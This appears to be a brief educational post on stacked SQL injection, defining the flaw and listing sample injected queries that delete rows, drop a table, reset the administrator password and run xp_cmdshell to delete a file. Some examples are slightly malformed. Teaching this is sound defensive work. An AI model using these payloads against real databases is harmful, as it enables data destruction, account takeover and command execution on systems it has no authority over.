Stack based SQL Injection

Definition:
In an SQL statement semicolon (;) is an indicator of the end of the query and we can start a new query after the semicolon (;). This behavior may be vulnerable with SQL injection if developer uses the user input directly in the SQL query. These kinds of queries are called Stacked Queries and this SQL Injection is called Stack Based SQL Injection or Stacked SQL Injection.
Stack-based SQL Injection is the most severe type of the SQL Injection because it allows an attacker to not only access the database but modify it as well. Stack-based SQL Injection may allow an attacker to delete the data permanently using DROP statements which can lead to permanent DoS attacks.
Example and Exploitation: 
Let's take an example of getting product_name from product_id as shown below:

SELECT product_name FROM Products WHERE product_id = 'XYZ'

If the product_id parameter is vulnerable to Stack-based SQL Injection, an attacker can add any query using a semicolon (;) as shown below:

SELECT product_name FROM Products WHERE product_id = 'XYZ'; DELETE FROM users

The above example shows that the second query can delete each raw of the users table. Here are the more examples of the exploitation:
Delete data: 

SELECT product_name FROM Products WHERE product_id = 'XYZ'; DELETE FROM products

Delete table: 

SELECT product_name FROM Products WHERE product_id = 'XYZ'; DROP users

Modify data: 

SELECT product_name FROM Products WHERE product_id = 'XYZ'; UPDATE users SET password='pwd' WHERE username='administrator'

Access Shell: 

SELECT product_name FROM Products WHERE product_id = 'XYZ'; exec master..xp_cmdshell 'DEL important_file.txt'

0 Comments